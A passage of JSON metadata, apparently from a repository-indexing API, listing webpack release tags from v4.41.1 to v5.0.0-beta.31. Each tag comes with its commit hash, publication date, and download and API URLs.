v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://cod